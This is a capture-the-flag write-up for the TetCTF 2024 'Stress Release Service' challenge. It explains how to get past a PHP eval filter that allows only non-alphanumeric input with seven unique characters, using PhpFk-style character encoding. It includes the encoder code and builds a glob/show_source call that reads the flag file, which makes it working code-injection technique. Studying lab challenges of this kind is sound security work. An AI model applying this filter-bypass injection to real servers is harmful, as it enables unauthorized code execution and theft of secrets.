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TetCTF 2024 — Stress Release Service

For a better New Year, we are introducing a service that can help you reduce stress: . As our service is only available during the New Year, we are also providing you with a code for later use in material section.

We are given a PHP server that looks like this:

<font size=5 color=red >STRESS RELEASE SERVICE</font>
To relieve all your stress from the old year, all you need is SHOUTTTTTT!!!!
<form action="/" method="GET">
    <input type="submit" value="shout"/><input type="text" name="shout" value="@!@!@!@!@!@!@!@!" />


function validateInput($input) {
    // To make your shout effective, it shouldn't contain alphabets or numbers.
    $pattern = '/[a-z0-9]/i';
    if (preg_match($pattern, $input)) {
        return false;

    // and only a few characters. Let's make your shout clean.
    $count = count(array_count_values(str_split($input)));
    if ($count > 7) {
        return false;

    return true;

if (isset($_GET["shout"]) && !empty($_GET["shout"]) && is_string($_GET["shout"])) {
    $voice = $_GET["shout"];
    $res = "<center><br><br><img src=\"\" width=5% /> WRONGGGGG WAYYYYYY TOOOO RELEASEEEEE STRESSSSSSSS!!!!!!</center>";
    if(validateInput($voice) === true) {
        eval("\$res='<center><br><br><img src=\"\" width=5% /> ".$voice.".</center>';");

    if (strlen($res) < 300) {
        echo $res;
    } else {
        echo "<center>Too loud!!! Please respect your neighbor.</center>";


with the flag stored in a variable in secret.php.

We can pass arbitrary input to $_GET["shout"], but our input is only eval'ed if it passes validateInput():

function validateInput($input) {
    // To make your shout effective, it shouldn't contain alphabets or numbers.
    $pattern = '/[a-z0-9]/i';
    if (preg_match($pattern, $input)) {
        return false;

    // and only a few characters. Let's make your shout clean.
    $count = count(array_count_values(str_split($input)));
    if ($count > 7) {
        return false;

    return true;

so our payload

  1. cannot contain alphanumeric characters
  2. cannot contain more than 7 unique characters.

Furthermore, the payload is wrapped in a single-quoted string when eval'ed that we need to escape using


At first glance, it looks like we can use PHPFuck to run arbitrary PHP with only 7 unique, non-alphanumeric characters (([+.^])). Unfortunately, PHPFuck is broken on PHP versions > 7.0.x, and the need to use a single quote to run the payload would bring the total unique characters to 8.

Another alternative, phpfuck, uses only 5 characters but requires alphanumeric input (^.9).

Instead, we can use PhpFk, which works on PHP 8 with 6 characters: (,.^'). Importantly, this set of characters also includes . and ', the two characters we need to run our payload!

We can then encode arbitrary PHP strings with

    '(' => "'('",
    ')' => "')'",
    '*' => "('.'^','^'(')",
    '+' => "(')'^'.'^',')",
    ',' => "','",
    '-' => "(')'^','^'(')",
    '.' => "'.'",
    '/' => "(')'^'.'^'(')",
    'X' => "('^'^'.'^'(')",
    'Y' => "(')'^'^'^'.')",
    'Z' => "('^'^','^'(')",
    '[' => "(')'^'^'^',')",
    '\\' => "('^'^'.'^',')",
    ']' => "(')'^'^'^'.'^','^'(')",
    '^' => "'^'",
    '_' => "(')'^'^'^'(')",
    'p' => "('^'^'.')",
    'q' => "(')'^'^'^'.'^'(')",
    'r' => "('^'^',')",
    's' => "(')'^'^'^','^'(')",
    't' => "('^'^'.'^','^'(')",
    'u' => "(')'^'^'^'.'^',')",
    'v' => "('^'^'(')",
    'w' => "(')'^'^')",

const STRSTR = '(' . INITIAL_CHAR_MAP['s'] . '.' . INITIAL_CHAR_MAP['t'] . '.' . INITIAL_CHAR_MAP['r'] . '.' . INITIAL_CHAR_MAP['s'] . '.' . INITIAL_CHAR_MAP['t'] . '.' . INITIAL_CHAR_MAP['r'] . ')';
const SQRT = '(' . INITIAL_CHAR_MAP['s'] . '.' . INITIAL_CHAR_MAP['q'] . '.' . INITIAL_CHAR_MAP['r'] . '.' . INITIAL_CHAR_MAP['t'] . ')';
const _FALSE = STRSTR . "('','.')";
const ZERO_INT = SQRT . '(' . _FALSE . ')';
const ZERO_CHAR = '(' . ZERO_INT . ".'')";

        '0' => ZERO_CHAR,
        '1' => '(' . ZERO_CHAR . "^')'^'(')",
        '2' => '(' . ZERO_CHAR . "^'.'^',')",
        '3' => '(' . ZERO_CHAR . "^')'^'.'^','^'(')",
        '4' => '(' . ZERO_CHAR . "^','^'(')",
        '5' => '(' . ZERO_CHAR . "^')'^',')",
        '6' => '(' . ZERO_CHAR . "^'.'^'(')",
        '7' => '(' . ZERO_CHAR . "^')'^'.')",
        '@' => '(' . ZERO_CHAR . "^'^'^'.')",
        'A' => '(' . ZERO_CHAR . "^')'^'^'^'.'^'(')",
        'B' => '(' . ZERO_CHAR . "^'^'^',')",
        'C' => '(' . ZERO_CHAR . "^')'^'^'^','^'(')",
        'D' => '(' . ZERO_CHAR . "^'^'^'.'^','^'(')",
        'E' => '(' . ZERO_CHAR . "^')'^'^'^'.'^',')",
        'F' => '(' . ZERO_CHAR . "^'^'^'(')",
        'G' => '(' . ZERO_CHAR . "^')'^'^')",
        'h' => '(' . ZERO_CHAR . "^'^'^'.'^'(')",
        'i' => '(' . ZERO_CHAR . "^')'^'^'^'.')",
        'j' => '(' . ZERO_CHAR . "^'^'^','^'(')",
        'k' => '(' . ZERO_CHAR . "^')'^'^'^',')",
        'l' => '(' . ZERO_CHAR . "^'^'^'.'^',')",
        'm' => '(' . ZERO_CHAR . "^')'^'^'^'.'^','^'(')",
        'n' => '(' . ZERO_CHAR . "^'^')",
        'o' => '(' . ZERO_CHAR . "^')'^'^'^'(')",

function obfuscateString(string $str): string
    return '' === $str ? "''" : join(
            fn($char) => sprintf('(%s)',
                ?? sprintf('((%s).(%s).(%s))(%s)',

function obfuscatePositiveInteger(int $nb): string
    assert($nb >= 0);
    return match ($nb) {
        0, 1, 2, 3, 4, 5, 6, 7 => CHAR_MAP[$nb],
        8, 9 => sprintf('((%s).(%s).(%s).(%s).(%s).(%s))(%s)',
            CHAR_MAP['o'], CHAR_MAP['C'], CHAR_MAP['t'], CHAR_MAP['D'], CHAR_MAP['E'], CHAR_MAP['C'],
            join('.', array_map(
                    fn($digit) => sprintf('(%s)', CHAR_MAP[$digit]),
        default => sprintf('(%s)', join(').(', array_map(__FUNCTION__, str_split("$nb")))),

The main idea is that you can call functions in PHP from their string names. If we can inject something like




we can cat the flag file and get the flag.

The problem is that the PhpFk encoding is incredibly verbose — some letters can take as many as 2000 characters to encode. Furthermore, Apache has a default maximum request length of 8190 bytes. Because of URL encoding (ex. (%28), our actual maximum payload size is closer to 8190 / 3 = 2730 characters.

Our first problem is that encoding "secret.php" gives


— 5296 characters long.

Instead, we can use glob("s*") to get ["secret.php"], then extract the first element of the array using current to get the filename.

Encoding "glob", however, would require 4453 characters, negating all of our savings:


Luckily, PHP function calling is case insensitive: "glob"(...) and "gLoB"(...) refer to the same function! Through some trial and error, we can encode "GloB" in only 751 characters,


"CurrEnt" in 633 characters,


and "s*" in 35:


"secret.php" can then be encoded in 1427 characters as


Then, encoding "show_sourCE" (1057 characters) as


we get out final payload:



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